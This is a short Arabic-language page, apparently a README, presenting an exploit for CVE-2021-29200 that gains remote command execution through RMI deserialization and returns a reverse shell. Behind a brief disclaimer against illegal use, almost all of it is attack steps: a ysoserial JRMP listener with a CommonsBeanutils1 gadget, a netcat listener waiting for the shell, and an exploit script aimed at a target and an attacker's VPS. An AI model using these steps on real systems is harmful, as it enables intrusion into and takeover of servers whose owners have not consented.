
استغلال لـ CVE-2021-29200 يمكّن من تنفيذ الأوامر عن بُعد عبر هجوم إلغاء تسلسل RMI باستخدام مستمع JRMP وتسليم حمولة شل عكسي.
CVE-2021-29200 EXP يمكنه بنجاح إرجاع Shell
هذه المقالة والأداة مخصصة فقط لمشاركة التقنية، ويُمنع منعاً باتاً استخدامها لأغراض غير قانونية. وإلا فإن كل العواقب الناتجة تكون على مسؤولية المستخدم.
RMI على منفذ 9999 في VPSjava -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 '[الأمر المراد تنفيذه]'
nc8443nc -lvp 8443
python3 cve-2021-29200_exp.py <target> <vps_ip> <vps_port>
